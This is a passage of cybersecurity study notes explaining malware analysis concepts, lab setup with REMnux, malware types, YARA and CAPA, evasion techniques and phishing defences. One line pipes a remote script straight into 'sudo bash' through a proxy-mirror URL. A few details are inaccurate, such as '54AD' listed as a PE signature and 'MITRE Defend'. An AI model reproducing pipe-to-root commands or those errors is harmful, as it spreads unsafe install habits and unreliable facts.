behavior.
How Hybrid Analysis Works:
- Initial Static Analysis: The malware is first examined using static techniques to extract basic
information (e.g., file type, metadata) and identify possible indicators of compromise (IoCs).
- Followed by Dynamic Analysis: The malware is executed in a sandbox to observe its real-time
behavior, providing insight into actions like network connections or changes to system files.
- Combination: By combining both approaches, analysts can correlate the file’s code structure
with its observed behaviors, providing a fuller picture of its functionality and potential impact.
Advantages:
- Static analysis gives an early understanding of the malware’s structure, while dynamic analysis
confirms its actual behavior. Together, they offer a more complete malware analysis.
8. Hypervisor
A Hypervisor, also known as a Virtual Machine Monitor (VMM), is software that creates and runs virtual
machines (VMs). A hypervisor allows multiple virtualized operating systems to run on a single physical
machine, sharing its hardware resources.
Types of Hypervisors:
- Type 1 (Bare-Metal Hypervisors): These run directly on the physical hardware, without requiring
a host operating system. Examples include VMware ESXi, Microsoft Hyper-V, and Xen.
- Type 2 (Hosted Hypervisors): These run on top of an existing operating system and manage
virtual machines as applications. Examples include VMware Workstation, Oracle VirtualBox, and
Parallels Desktop.
Functions of a Hypervisor:
- Resource Allocation: The hypervisor allocates resources like CPU, memory, and storage
between virtual machines.
- Isolation: Virtual machines are isolated from each other, meaning that if one crashes or is
compromised, it doesn’t affect the others.
- Virtual Networking: Hypervisors provide virtual networking capabilities, allowing VMs to
communicate with each other or the outside world through virtual switches and network
interfaces.
Use Cases:
- Hypervisors are commonly used in data centers to run multiple virtualized servers on the same
hardware, allowing for more efficient resource utilization.
- In cybersecurity, hypervisors are used to create sandbox environments for malware analysis.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Emerging threats Suricata
Wireshark & TCPDUMP
Mitre Defend
Artifact
Lolbas
Why malware analysis used according to different roles
Showing credential stores in cookie
NAT
SNAT
DNAT
PAT
VPN working
IPSEC Protocol
1. Emerging Threats Suricata
Suricata is an open-source network security monitoring engine that serves as an intrusion detection
system (IDS), intrusion prevention system (IPS), and network security monitoring (NSM) tool. Emerging
Threats refers to a set of signature rules that are continuously updated to detect new and sophisticated
attack patterns.
Suricata & Emerging Threats:
- Suricata: It inspects network traffic and detects suspicious activity based on signature-based,
anomaly-based, and protocol-based analysis.
- Emerging Threats: The Emerging Threats (ET) community provides a comprehensive rule set
for Suricata that includes detection for known and zero-day threats. These rule sets evolve
quickly to counter new attack vectors such as malware, exploits, phishing, ransomware, and
advanced persistent threats (APTs).
Why It’s Important:
- Emerging threats detection helps organizations stay ahead of cyber attackers by using
up-to-date signatures to identify the latest tactics, techniques, and procedures (TTPs).
- Suricata with ET rules provides real-time network analysis and offers better visibility into
potential threats.
2. Wireshark & TCPDUMP
Wireshark and TCPDUMP are powerful network packet analysis tools used for capturing and analyzing
network traffic.
Wireshark:
- A graphical network protocol analyzer that allows users to capture live network traffic and
analyze it in detail. Wireshark is used for identifying network issues, debugging protocols, and
detecting suspicious activities.
- Features:
- Packet filtering and dissection of hundreds of network protocols.
- A graphical interface that shows detailed information about each captured packet.
- Ability to highlight anomalies or abnormal patterns in the network traffic.
TCPDUMP:
- A command-line packet capturing tool used to intercept and display network packets transmitted
over a network. It provides similar functionality to Wireshark but operates via the command line
and lacks the graphical interface.
- Features:
- Lightweight and efficient for real-time traffic capture.
- Advanced packet filtering options with BPF (Berkeley Packet Filter) syntax.
- Typically used on Linux or UNIX-based systems for quick packet analysis.
Use Cases:
- Wireshark: Deep dive into packet-level data with a user-friendly interface, great for detailed
protocol analysis.
- TCPDUMP: Quick packet capture and troubleshooting, especially in environments where using
a GUI is not feasible.
3. MITRE Defend
MITRE Defend is a knowledge base framework that focuses on defensive countermeasures in

cybersecurity. It complements the MITRE ATT&CK framework, which focuses on adversary tactics and
techniques.
Key Concepts of MITRE Defend:
- Proactive Defense: It helps defenders understand how to prevent or disrupt attacker behaviors
by offering specific defensive techniques.
- Mapping Defensive Techniques: Similar to how ATT&CK maps adversary techniques, Defend
maps defensive capabilities such as network segmentation, malware analysis, monitoring, and
deception techniques.
- It provides a systematic approach for security teams to build and assess their defenses against
known adversary tactics.
- MITRE Defend can be used to prioritize defensive investments based on likely attack patterns
and threat models.
4. Artifact
In cybersecurity, an artifact refers to any digital evidence or data that can be collected during an
investigation. Artifacts are used to reconstruct an attack, understand the behavior of malware, or gain
insight into the actions of an adversary.
Types of Artifacts:
- File Artifacts: Malicious files, scripts, or binaries left by attackers (e.g., trojans, ransomware
payloads).
- System Artifacts: Registry changes, log entries, process creation events, or other modifications
to the operating system.
- Network Artifacts: Packet captures, URLs, domains, or IP addresses involved in an attack.
Use in Malware Analysis:
- Artifacts are crucial for reconstructing the kill chain of a cyberattack and for developing detection
signatures (e.g., in IDS/IPS systems).
5. LOLBAS (Living Off The Land Binaries and Scripts)
LOLBAS refers to Living Off the Land Binaries and Scripts. These are legitimate tools, scripts, and
executables that come pre-installed in operating systems but are often abused by attackers for
malicious purposes.
Common LOLBAS Examples:
- PowerShell: Often used by attackers to execute malicious commands or scripts.

- WMIC (Windows Management Instrumentation Command-line): Used to query information or
execute system commands remotely.
- Certutil: Used by attackers to download malicious files while appearing as legitimate
cryptographic operations.
- Since these tools are legitimate, it’s harder for traditional security solutions to detect them as
malicious. Attackers using LOLBAS can evade detection by avoiding custom malware and using
trusted tools in the attack chain.
6. Why Malware Analysis is Used According to Different Roles
Malware analysis is used by different cybersecurity professionals for various purposes, depending on
their role:
Security Operations Team:
- Goal: Quickly identify and mitigate active malware threats in the network.
- Use Case: Determine the nature of the malware (e.g., ransomware, spyware) to prioritize the
incident response plan.
Threat Hunters:
- Goal: Identify advanced threats that have bypassed existing defenses.

- Use Case: Analyze new or sophisticated malware strains to understand their attack techniques
and improve threat-hunting capabilities.
Forensic Analysts:
- Goal: Investigate and reconstruct an attack for legal or compliance purposes.

- Use Case: Perform in-depth analysis of malware artifacts to understand the full scope of an
attack.
Malware Researchers:
- Goal: Develop new defenses and detection techniques by understanding malware behavior.
- Use Case: Reverse-engineer malware to find vulnerabilities or weak points that defenders can
exploit.
7. Showing Credential Stores in Cookies
Insecure websites may store credentials (such as usernames and passwords) in cookies, which is a
dangerous practice. If an attacker can gain access to a user's cookies (e.g., through cross-site scripting
(XSS)), they can extract sensitive data.
Risks:
- Cookie Theft: Attackers can steal cookies and use them to impersonate users, especially if the
session information is stored in the cookie.
- Improper Use of Session Tokens: If cookies contain unencrypted or non-hashed credentials,
attackers can easily exploit this information.
Mitigation:
- Use HTTP-only and secure flags on cookies.

- Avoid storing sensitive data like credentials in cookies; instead, use session tokens and proper
encryption.
8. NAT (Network Address Translation)
NAT (Network Address Translation) is a process in which a network device, usually a firewall or router,
translates private IP addresses into public IP addresses before the data is transmitted to the internet.
Types of NAT:
- SNAT (Source NAT): Changes the source IP address of outbound traffic. This is used when
multiple devices inside a private network share a single public IP address.
- DNAT (Destination NAT): Changes the destination IP address of incoming traffic. This is often
used to route external traffic to a specific internal device (e.g., port forwarding).
- PAT (Port Address Translation): A type of NAT where multiple devices on a private network are
mapped to a single public IP address but are differentiated by their port numbers. It’s commonly
referred to as NAT overload.
Why NAT is Used:
- Provides privacy by hiding internal IP addresses from the outside world.

- Conserves the number of public IP addresses needed.
9. VPN (Virtual Private Network) Working
A VPN (Virtual Private Network) is a technology that allows users to create a secure and encrypted
connection over the internet. VPNs are often used to connect remote users to private networks or to
protect privacy online.
How VPN Works:
- Encryption: All data transmitted through the VPN is encrypted, making it unreadable to anyone
who intercepts it.
- Tunneling: VPNs create a secure tunnel through which data passes. The tunneling protocols
used include PPTP, L2TP, OpenVPN, and IPsec.
- Masking IP Address: A VPN hides the user’s real IP address and replaces it with one from the
VPN server, improving privacy and circumventing geo-restrictions.
10. IPsec (Internet Protocol Security) Protocol
IPsec is a suite of protocols used to secure internet communications by authenticating and encrypting
each IP packet during transmission.
Key Components of IPsec:
- Authentication Header (AH): Provides data integrity and authentication for the packet but does
not encrypt the data.
- Encapsulating Security Payload (ESP): Provides both encryption and authentication of the
packet, offering more security than AH.
- IKE (Internet Key Exchange): Handles the negotiation of security associations and the
exchange of cryptographic keys to establish a secure connection.
Use Case:
- IPsec is widely used in VPNs to establish secure, encrypted tunnels between remote users and
networks, ensuring confidentiality and integrity of data transmitted over the internet.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Load balancer
SQUID
SERVER FARMING
Installing Remnux
Network Mode
NAT
Bridge
Host-Only Based
Static Analysis of Malicious Document
Excel
PDF
DOCX
1. Load Balancer
A load balancer is a device or software application that distributes network traffic across multiple
servers to ensure no single server becomes overwhelmed with too many requests. Load balancers
optimize resource use, improve application reliability, and prevent downtime.
Types of Load Balancers:
- Layer 4 Load Balancer: Operates at the transport layer (Layer 4 of the OSI model). It uses data
like IP addresses and TCP/UDP ports to distribute traffic. Example: HAProxy.
- Layer 7 Load Balancer: Operates at the application layer (Layer 7 of the OSI model). It uses
data like HTTP headers or cookies to make decisions about traffic distribution. Example:
NGINX.
Load Balancer Methods:
- Round-Robin: Distributes traffic equally across all servers.

- Least Connections: Directs traffic to the server with the fewest active connections.
- IP Hashing: Routes traffic based on the IP address of the client, ensuring repeat requests from
the same user are sent to the same server.
Benefits:
- Fault Tolerance: If one server fails, traffic can be routed to another server.
- Scalability: As traffic increases, more servers can be added to the load balancer.
- Improved Performance: Balancing traffic across servers prevents bottlenecks, ensuring faster
response times.
2. Squid
Squid is an open-source proxy server and web caching service that optimizes data flow between a
client and server by caching frequently accessed web content. It helps reduce bandwidth usage and
speeds up access to frequently requested data.
Key Features:
- Web Caching: Squid stores copies of frequently requested web pages and files, reducing the
need for repeated downloads from the internet.
- Proxying: Squid acts as an intermediary, forwarding client requests to the appropriate web
server. This improves security by masking the client’s identity.
- Access Control: Squid can enforce access control policies, limiting which clients can access
specific websites or services.
Use Cases:
- Content Filtering: Blocking access to specific websites or web services.

- Improved Network Performance: Caching reduces latency by serving content from local storage
rather than fetching it from remote servers.
- Anonymous Browsing: Users can hide their IP addresses when accessing websites.
3. Server Farming
Server Farming refers to the practice of using a group of servers that work together to handle large
volumes of requests and workloads. A server farm (also known as a data center) is a collection of
interconnected servers housed in one location and managed centrally.
Characteristics:
- Scalability: Server farms can scale horizontally by adding more servers to handle increasing
loads.
- Redundancy: If one server fails, another can take over, providing high availability.
- Load Distribution: Traffic is distributed across multiple servers, often using a load balancer to
manage the requests efficiently.
Use Cases:
- Web Hosting: Large websites and applications rely on server farms to handle thousands or
millions of users simultaneously.
- Cloud Computing: Cloud services like AWS and Google Cloud use server farms to provide
scalable infrastructure for computing, storage, and networking.
- Big Data Processing: Server farms are essential for performing massive data analytics and
computations (e.g., machine learning, AI).
4. Installing Remnux
REMnux is a Linux distribution designed specifically for malware analysis. It comes pre-installed with a
variety of tools for reverse engineering and analyzing malicious software, such as disassemblers,
de-obfuscators, and network traffic analyzers.
Steps for Installing REMnux:
1. Download REMnux: You can either install REMnux as a standalone system or use it as a Virtual
Machine (VM) in environments like VirtualBox or VMware.
2. Virtual Installation:
- Create a new virtual machine in your hypervisor (VirtualBox/VMware).
- Configure settings (allocate CPU, memory, and disk space).
- Install REMnux from an ISO or import the OVA file.
3. Command-Line Installation (If you want to add REMnux tools to an existing Ubuntu installation):
- Run: “ wget -q -O - https://remnux.org/get-remnux.sh | sudo bash”
4. Install and update the tools using `remnux upgrade`.
Network Modes (Virtual Machine Networking Options):
- NAT (Network Address Translation): The virtual machine connects to the host’s network and
uses the host’s IP address to access the internet. Good for general use but hides the VM from
the rest of the network.
- Bridged Mode: The VM connects directly to the host's physical network and gets its own IP
address. This allows the VM to act like any other device on the network and be accessible by
other machines on the same network.
- Host-Only Mode: The VM can communicate only with the host machine and other VMs on the
same host. It’s isolated from external networks, making it useful for isolated malware analysis.
5. Static Analysis of Malicious Documents
Static analysis involves examining the structure, content, and metadata of files without executing them.
In the context of malicious documents, static analysis can be applied to files like Excel spreadsheets,
PDFs, and DOCX documents.
Excel (XLS/XLSX) Analysis:
- Embedded Macros: Malicious Excel files often contain VBA (Visual Basic for Applications)
macros that can be used to download malware, open network connections, or modify system
settings.
- Static Analysis Tools: Use tools like òlevba` or `XLMMacroDeobfuscator` to extract and analyze
macros in Excel documents.
- Indicators of Compromise (IoCs): Look for suspicious URLs, obfuscated code, or commands
that indicate the file is trying to access external resources or execute system commands.
PDF Analysis:
- JavaScript: PDF files can contain embedded JavaScript, which can be exploited to execute
malicious code. Attackers may use this feature to perform drive-by downloads or exploit
vulnerabilities in PDF readers.
- Malicious Objects: PDFs may also contain embedded files, images, or links that redirect users
to malicious websites.
- Static Analysis Tools: Use tools like `pdfid` and `pdf-parser` to inspect the structure and content
of PDF files, identifying suspicious elements like streams or embedded scripts.
DOCX Analysis:
- Macro-Based Malware: Similar to Excel files, DOCX files may contain malicious macros, often
used to drop malware or open remote connections.
- OLE Objects: Malicious Word documents may contain embedded OLE objects, such as
executables or scripts. These can be extracted and analyzed for potential threats.
- Static Analysis Tools: Use òletools` to inspect macros, extract metadata, and identify hidden
payloads in Word documents.
6. Network Mode
The network mode defines how a virtual machine interacts with other devices on the network. The three
common modes are:
- NAT (Network Address Translation): The VM uses the host’s IP address to access the external
network but is not directly accessible from other devices on the network.
- Bridged: The VM gets its own IP address on the same network as the host, making it
fully accessible like any other device on the local network.
- Host-Only: The VM can only communicate with the host machine and other VMs,
isolating it from the external network. This is useful for testing environments like malware
sandboxes, where you don’t want the VM to communicate with the internet.
7. Static Analysis of Malicious Documents (More Details)
Static Analysis focuses on examining the structure of files like Excel, PDF, and DOCX without executing
them. Here's a deeper dive into each document type:
Excel (XLS/XLSX):
- Macro Analysis: VBA macros embedded in Excel files are a common method for attackers to
deliver malware. Static analysis involves inspecting the macro code for suspicious functions,
such as downloading files from the internet or modifying system settings.
- Tool: òlevba` can extract and analyze VBA macros.
PDF Analysis:
- Embedded Scripts: PDFs often contain embedded JavaScript, which can be malicious. Static
analysis involves inspecting these scripts for potentially harmful functions.
- Tool: `pdf-parser` allows you to extract and inspect objects within a PDF.
DOCX Analysis:
- Embedded Macros: Similar to Excel files, DOCX documents can contain malicious macros that
execute payloads when opened.
- Tool: òletools` is useful for extracting and analyzing these macros for signs of malicious
behavior.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Defense in Depth
Malware Attack
Malware Types
Malware Family
History of Malware
Defensive Evasion
Safety Precaution
1. Defense in Depth
Defense in Depth is a layered security strategy that employs multiple defensive measures to protect
against a wide range of attacks. Instead of relying on a single security control, Defense in Depth aims
to create redundancies and minimize the risk of any one defense mechanism being breached.
Layers of Defense in Depth:
- Physical Security: Security measures like surveillance cameras, security guards, and access
control systems to protect physical hardware.
- Perimeter Security: Firewalls, intrusion detection/prevention systems (IDS/IPS), and proxy
servers to control access to the network.
- Network Security: Segmentation of internal networks, using Virtual Local Area Networks
(VLANs), implementing VPNs, and secure communication protocols like TLS.
- Endpoint Security: Antivirus, anti-malware, Endpoint Detection and Response (EDR) solutions
to protect individual devices (PCs, servers, mobile devices) from attacks.
- Application Security: Secure coding practices, patch management, web application firewalls
(WAF), and vulnerability scanning of applications.
- Data Security: Encrypting sensitive data at rest and in transit, managing access control to critical
files, and using Data Loss Prevention (DLP) tools.
- Security Awareness: Training employees to recognize phishing attacks, social engineering, and
malware tactics.
- Redundancy: Multiple layers of security ensure that if one defense fails, others can still protect
the system.
- Defense Against a Range of Attacks: By implementing various security measures, organizations
are better protected from a wide array of threats like malware, insider attacks, and APTs
(Advanced Persistent Threats).
- Mitigating Risk: Defense in Depth reduces the overall risk of a security breach, even in highly
complex and interconnected environments.
2. Malware Attack
A malware attack occurs when malicious software infiltrates a system or network, compromising its
integrity, confidentiality, and availability. Malware attacks can be used for stealing sensitive information,
causing damage to systems, or taking control of networks for further malicious activity.
Stages of a Malware Attack:
- Infection/Delivery: The malware is delivered to the target system. Common delivery methods
include phishing emails, malicious attachments, drive-by downloads, and USB devices.
- Execution: Once delivered, the malware is executed. This could happen automatically when the
file is opened or through user action, like enabling macros in a document.
- Propagation: Some malware, such as worms, can spread from the initially infected system to
other devices on the network.
- Payload Activation: The main function of the malware is executed. This could involve stealing
data, encrypting files (ransomware), or providing remote access to an attacker (remote access
trojan, or RAT).
- Persistence: Malware often tries to maintain long-term access to a system by creating
backdoors or modifying system configurations to ensure it survives reboots or user attempts to
remove it.
3. Malware Types
There are various types of malware, each with a unique purpose and attack method. Here are some of
the common types:
1. Virus:
a. A type of malware that attaches itself to legitimate programs or files and spreads when these
programs are executed. Viruses can corrupt files, steal data, or disable system functions.
2. Worm:
a. Unlike a virus, worms can self-replicate and spread across networks without the need to attach
to a host file. Worms are often responsible for widespread network infections.
3. Trojan Horse (Trojan):
a. A Trojan disguises itself as a legitimate file or software but secretly carries out malicious actions.
It often serves as a backdoor for attackers to gain control of the system.
4. Ransomware:
a. Ransomware encrypts files on the victim’s system and demands a ransom payment (usually in
cryptocurrency) for the decryption key.
5. Spyware:
a. Spyware secretly monitors user activity, collects sensitive information (e.g., passwords, credit
card numbers), and sends it back to the attacker without the user's knowledge.
6. Adware:
a. Adware automatically displays or downloads advertisements, often redirecting users to
malicious sites or tracking their online behavior.
7. Rootkit:
a. Rootkits allow attackers to gain elevated privileges on a compromised system and hide their
presence. They can modify system files or processes to evade detection.
8. Keylogger:
a. Keyloggers capture and log keystrokes made by the user, often to steal sensitive data such as
usernames, passwords, and credit card details.
9. Botnet:
a. A group of compromised systems controlled by an attacker (the botmaster) is called a botnet.
These systems are used to carry out large-scale attacks like Distributed Denial of Service
(DDoS).
4. Malware Family
A malware family refers to a group of malware variants that share common characteristics or codebase.
Malware families are often named based on the malware’s creator or the functionality of the malware.
Security researchers identify and categorize malware based on behavioral patterns, signatures, or code
similarities.
Examples:
- Emotet: A family of banking Trojans that spreads through phishing emails and often downloads
additional payloads like ransomware.
- Zeus: A family of Trojan malware primarily designed to steal banking credentials by intercepting
form inputs from web browsers.
- Locky: A ransomware family that spreads through email attachments and encrypts users’ files.
5. History of Malware
The history of malware dates back several decades, and the evolution of malware has progressed in
parallel with the development of computer systems and the internet.
Key Milestones in Malware History:
- 1971 - Creeper Virus: The first known computer virus, Creeper, was created as an experiment in
self-replication.
- 1986 - Brain Virus: One of the first viruses to target the MS-DOS operating system, Brain was a
boot-sector virus.
- 1999 - Melissa Virus: A macro virus that spread via Microsoft Word email attachments, causing
significant disruption to corporate email systems.
- 2000 - ILOVEYOU Worm: One of the most damaging worms, ILOVEYOU spread via email and
caused billions of dollars in damage by overwriting files and sending itself to all contacts in the
victim's address book.
- 2007 - Zeus Trojan: A highly sophisticated banking Trojan that became widespread, stealing
online banking credentials from millions of infected systems.
- 2017 - WannaCry Ransomware: A devastating ransomware attack that exploited a vulnerability
in Windows SMB protocol, spreading rapidly across the globe and affecting critical systems like
hospitals and telecommunications.
6. Defensive Evasion
Defensive evasion refers to the techniques used by malware and attackers to avoid detection by
security tools like antivirus, firewalls, intrusion detection/prevention systems (IDS/IPS), and endpoint
detection and response (EDR) solutions.
Common Defensive Evasion Techniques:
- Obfuscation: Malicious code is obscured or obfuscated to avoid detection by security tools. This
can involve encoding, encryption, or packing the malware.
- Code Signing Abuse: Attackers may use stolen or forged digital certificates to sign their
malicious software, making it appear legitimate to security software.
- Anti-Sandboxing: Malware checks if it is being executed in a virtualized or sandboxed
environment (typically used for analysis) and avoids execution in such cases.
- Disabling Security Software: Malware may attempt to disable or tamper with antivirus programs,
firewalls, or other protective measures to avoid detection.
- Fileless Attacks: Attackers avoid writing files to disk by executing malicious code directly in
memory (fileless malware), making detection by traditional file-scanning antivirus tools difficult.
7. Safety Precaution
Safety precautions refer to the steps individuals and organizations can take to protect themselves from
malware, cyberattacks, and other security risks.
Common Safety Precautions:
- Keep Software Updated: Always apply security patches and updates to operating systems,
browsers, and applications to avoid exploitation of known vulnerabilities.
- Use Strong, Unique Passwords: Employ password managers and ensure that passwords are
strong and unique across different accounts. Enable multi-factor authentication (MFA) wherever
possible.
- Backup Important Data: Regularly back up critical data and store it offline or in a secure cloud
environment. This is particularly important to mitigate the impact of ransomware.
- Educate Users on Phishing: Employees and users should be trained to recognize phishing
attempts, avoid suspicious links or attachments, and verify the sender of unexpected emails.
- Install and Maintain Antivirus Software: Keep antivirus and anti-malware software up to date and
ensure it is set to automatically scan files and monitor the system for suspicious behavior.
- Use a Firewall: Employ firewalls to block unauthorized access to systems and networks, and
restrict incoming and outgoing traffic based on predefined security rules.
- Secure Remote Access: Ensure that remote access tools (e.g., VPN, RDP) are properly
secured using encryption, strong passwords, and MFA to prevent unauthorized access.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Indicator of Attack and common possibility for attack indicator
YARA Rules
CAPA
Signature
PE signature value
54AD
4550
MIME
Packer
Compiler
Crypter
1. Indicator of Attack (IoA) and Common Possibility for Attack Indicators
Indicator of Attack (IoA) refers to any behavioral sign that suggests an ongoing or attempted malicious
activity within a system or network. Unlike Indicators of Compromise (IoCs), which focus on
post-incident evidence (such as specific malware hashes or IP addresses), IoAs focus on the attacker’s
behavior or tactics.
Common IoAs:
- Unusual Network Traffic: High levels of outgoing data, unexpected communication with external
servers, or attempts to access restricted network areas.
- Anomalous File Activity: Unauthorized file modifications, the sudden creation of new files, or
attempts to delete large volumes of data.
- Process Injection: Malicious code injected into legitimate processes to evade detection and
persist within the system.
- Privilege Escalation Attempts: Unauthorized attempts to increase user privileges, allowing
attackers to execute higher-level commands.
- Execution of Known Malicious Tools: Running recognized hacking tools or known malware
executables, like Metasploit or Cobalt Strike beacons.
- Behavioral Anomalies: Actions like disabling antivirus, changing firewall rules, or abnormal user
activity after hours.
Common Possibilities for Attack Indicators:
- Unauthorized Remote Access: Unexpected use of remote desktop services, VPN connections,
or SSH access.
- Credential Dumping: Tools like Mimikatz being used to extract passwords from memory.
- Lateral Movement: Attackers moving between systems on a network, using compromised
credentials or exploiting vulnerabilities.
- Persistence Mechanisms: Registry changes, creation of scheduled tasks, or modification of
startup files to ensure the malware remains on the system after reboot.
2. YARA Rules
YARA (Yet Another Recursive Acronym) is a tool designed to identify and classify malware by creating
signatures (rules) that describe patterns found in malware samples. These rules are used in static
analysis to detect specific types of malware or malicious code across files, executables, or memory.
YARA Rule Structure:
- Meta Section: Describes the rule’s metadata, such as its author, date of creation, and purpose.
- Strings Section: Defines the text, binary, or regular expression patterns the rule will search for in
files or memory dumps.
- Condition Section: Specifies the conditions that must be met for the rule to match. This includes
criteria like whether certain strings must be present or occur in a specific combination.
Example YARA Rule:
```yara
rule ExampleRule
meta:
author = "John Doe"
description = "Detects sample malware"
date = "2024-10-21"
strings:
$str1 = "malicious_function"
$str2 = { 6A 00 68 00 30 00 00 6A 04 68 00 40 00 00 50 }
condition:
$str1 or $str2
```
This rule searches for a specific string (`malicious_function`) or a particular sequence of hex bytes in
files and matches if either is found.
3. CAPA
CAPA is a tool created by FireEye (now Mandiant) for automated analysis of executable files,
specifically focusing on malware. CAPA identifies the capabilities and behaviors of a program by
analyzing its code. It’s particularly useful in identifying what a piece of malware can do without actually
executing it.
Key Features of CAPA:
- Static Analysis: CAPA uses patterns and heuristics to inspect the structure of a PE (Portable
Executable) file to determine its functionality.
- Rule-Based: Similar to YARA, CAPA relies on a set of predefined rules that describe common
malware behaviors like file creation, network communication, or process injection.
- Layered Analysis: CAPA analyzes binaries at various levels, such as identifying the use of
system APIs, file manipulation, and the presence of embedded code.
- Example Output of CAPA:
CAPA might identify that a malware sample is capable of:
- Creating/Deleting Files
- Injecting Code into Other Processes
- Making HTTP Requests
4. Signature
A signature in malware analysis is a distinctive pattern or sequence that can be used to identify specific
malware variants or types. Signatures are typically used in traditional antivirus software and intrusion
detection systems (IDS) to detect known malware based on predefined patterns.
Types of Signatures:
- File-Based Signatures: Specific sequences of bytes within a file that are unique to a particular
piece of malware.
- Behavior-Based Signatures: Patterns of system behavior (e.g., attempts to connect to certain IP
addresses or modify specific registry keys) associated with malicious activity.
- Network Signatures: Patterns of network traffic (such as DNS requests or HTTP headers) that
suggest malware communication.
5. PE Signature Value
A Portable Executable (PE) signature refers to the unique identifier found in PE files, which is a format
used for executables, DLLs, and other Windows binaries. PE files have specific magic numbers or
signature values at certain offsets that indicate the file type.
PE Signature in Hex:
- "54AD": Not a common or widely known magic number in the context of standard PE files.
- "4550": This is the hexadecimal representation of the ASCII string "PE" (Portable Executable).
In PE files, this "PE" signature value can be found at a specific offset to indicate the beginning of
the PE header.
6. MIME
MIME (Multipurpose Internet Mail Extensions) is a standard that extends the format of email messages
to support text in character sets other than ASCII, as well as attachments such as images, videos, and
application files.
Uses:
Email Attachments: MIME allows emails to include multimedia content and attachments, such
as images and executable files.
- HTTP Requests: In web traffic, MIME types are used to indicate the content type of a file
(e.g., `text/html`, ìmage/png`, àpplication/pdf`).
MIME-Type Example:
- text/html: Represents an HTML document.

- application/pdf: Represents a PDF document.
- image/jpeg: Represents a JPEG image.
7. Packer
A packer is a tool used to compress or encrypt executable files, reducing their size or obfuscating their
code. Packers are often used by malware authors to make analysis more difficult and to evade
signature-based detection.
How It Works:
- Compression: Packers compress the original code and data of an executable to save space.
Upon execution, the program decompresses itself in memory before running.
- Obfuscation: By modifying the file structure or encrypting sections of the executable, packers
can prevent static analysis tools from easily inspecting the contents of the malware.
Common Packers:
- UPX (Ultimate Packer for Executables): A widely used open-source packer.

- Themida: A commercial packer that offers more sophisticated protection, including
anti-debugging and anti-reverse engineering techniques.
8. Compiler
A compiler is a program that translates high-level programming code (like C or C++) into machine code
or executable binaries. Malware authors use compilers to convert their malicious code into an
executable format that can run on a target system.
Why It’s Important in Malware Analysis:
- Compiler Identification: By identifying which compiler was used to create a malware sample,
analysts can gather clues about its origin or determine if multiple samples were created by the
same attacker.
- Compiler Artifacts: Compilers leave traces or patterns in the binaries they create (e.g., certain
sections or functions), which can be used to identify or classify malware.
9. Crypter
A crypter is a tool used to encrypt or obfuscate malware to prevent detection by antivirus or security
software. The purpose of using a crypter is to make the malware harder to analyze and evade static
detection methods.
How Crypters Work:
- Encryption: Crypters encrypt the original malicious code and bundle it with a decryption routine.
When the malware is executed, it first decrypts itself in memory and then runs the original
malicious payload.
- Polymorphism: Some crypters use polymorphic techniques to change the appearance of the
malware each time it’s encrypted, making it harder for traditional signature-based detection
methods to identify the malware.
Crypter vs. Packer:
- Crypter: Primarily focuses on encrypting malware to evade detection.

- Packer: Compresses the malware to reduce size but may also provide some obfuscation or
anti-analysis features.
---------------------------------------------------------------------------------------------------------------------------------------------------
***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Spear Phishing Analysis
SPF & DKIM Records
Phishtank
zero Day Attack
DNS Tunneling
Ramnite Banking Trojan
Case Study
Working of SIEM Tool
1. Spear Phishing Analysis
Spear phishing is a targeted phishing attack aimed at specific individuals or organizations, often with
the goal of stealing sensitive information like login credentials or deploying malware. Unlike regular
phishing, spear phishing uses personalized information about the target to make the attack more
convincing.
Spear Phishing Analysis:
1. Attack Vector: Typically begins with an email crafted to appear as though it comes from a
trusted source, such as a colleague or business partner.
2. Indicators of Spear Phishing:

- Urgent Language: Messages that create a sense of urgency, asking for immediate action (e.g.,
transferring money or updating credentials).
- Spoofed Email Address: The sender’s email address is altered to look like it's from a trusted domain.
- Malicious Attachments or Links: These often contain malware or lead to fake websites designed to
capture credentials.
3. How to Detect and Analyze:
- Inspect Headers: Check email headers for inconsistencies in the sender’s domain or routing paths.
- Analyze Links: Use URL scanning tools to verify the safety of links in emails.
- Check Attachments: Attachments can be analyzed in a sandbox or through static and dynamic malware
analysis tools.
- SPF & DKIM Records
- SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) are two important
email authentication mechanisms that help verify the legitimacy of the email sender and prevent
email spoofing.
SPF:
- Purpose: SPF allows domain owners to specify which mail servers are allowed to send emails
on behalf of their domain. When an email is received, the receiving mail server checks the
sender's IP address against the domain's SPF record in DNS.
- SPF Record Example:
“ v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 include:spf.third-party.com ~all “
This SPF record specifies that emails sent from the listed IP addresses are authorized to send
emails on behalf of the domain.
DKIM:
- Purpose: DKIM adds a digital signature to email headers, allowing the receiving mail server to
verify that the email was not tampered with during transit. The signature is validated using a
public key published in the sender's DNS records.
- How DKIM Works:
- The sender’s mail server generates a cryptographic signature for the email and
adds it to the email header.
- The recipient’s mail server retrieves the public key from DNS and verifies the
signature.
4.Phishtank
Phishtank is a collaborative, community-based platform where users submit and share information
about phishing websites. It is maintained by OpenDNS and helps security professionals identify and
block phishing threats.
How Phishtank Works:
- User Submissions: Anyone can submit suspicious URLs to Phishtank.

- Verification: The community or automated systems verify whether a submitted URL is a phishing
attempt.
- API Integration: Security tools and systems can use the Phishtank API to check whether a URL
is part of a known phishing attack.
Usage:
- Phishtank is widely used to block phishing attempts in real-time by integrating its data into email
filtering systems, firewalls, and web gateways.
5.Zero-Day Attack
A zero-day attack refers to an attack that exploits a previously unknown vulnerability in software or
hardware. Since the vulnerability is unknown to the software vendor, no patch or fix is available at the
time of the attack.
How Zero-Day Attacks Work:
- Discovery: Attackers discover a vulnerability in software, such as in an operating system,

browser, or application.
- Exploitation: The attackers develop an exploit to take advantage of the vulnerability. This could
involve remote code execution, privilege escalation, or bypassing security controls.
- Attack Execution: Attackers launch the attack before the software vendor becomes aware of the
vulnerability or has time to release a patch, hence the term "zero-day."
Prevention:
- Patch Management: Keeping systems up to date is crucial to prevent attacks on older

vulnerabilities.
- Threat Intelligence: Monitoring threat intelligence feeds can help detect zero-day attacks early.
